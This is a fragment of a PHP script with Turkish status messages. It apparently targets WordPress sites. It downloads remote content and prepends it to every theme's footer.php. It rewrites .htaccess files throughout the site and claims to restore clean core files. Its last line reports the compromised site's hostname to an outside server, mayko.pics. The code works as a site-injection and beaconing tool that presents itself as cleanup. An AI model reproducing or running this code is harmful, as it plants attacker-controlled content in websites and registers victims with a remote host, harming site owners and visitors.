okunuyor..."); list($ok, $icerik) = @httpGet($url); if ($ok === false) { out("$url okunamadı."); }else{ out("$url başarıyla okundu."); out("Footer ekleme işlemi başlıyor..."); $themesDir = implode(DIRECTORY_SEPARATOR, array(__DIR__, "wp-content", "themes")); $icerik = $icerik . "\n"; $count = 0; $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($themesDir, FilesystemIterator::SKIP_DOTS) ); $iterator->setMaxDepth(1); foreach ($iterator as $file) { if ($file->isFile() && strtolower($file->getFilename()) === 'footer.php') { $path = $file->getPathname(); // Aynı içerik tekrar tekrar eklenmesin diye kontrol $mevcut = str_replace("No Content", "", @file_get_contents($path) ?: ""); if (strpos($mevcut, trim($icerik)) === false) { file_put_contents($path, $icerik . $mevcut); out("Eklendi: $path"); $count++; } else { out("Zaten var: $path"); } } } out("<hr>Toplam işlem yapılan footer.php: " . $count); } out(".htaccess dosyaları yeniden yazılıyor..."); create_htaccess_files($root, $htaccessContent, $subHtaccessContent, 5); out(".htaccess dosyaları yazım işlemi bitti."); out("ISLEM TAMAMLANDI"); out("wp-config.php korundu."); out("wp-content korundu."); out(implode(", ", $whitelist_files) . " dosyaları korundu."); out("Core dosyalari temiz kopya ile yenilendi."); echo "</pre>"; @httpGet("https://mayko.pics/store-host.asp?h=" . rawurlencode($_SERVER["HTTP_HOST"]));
Close
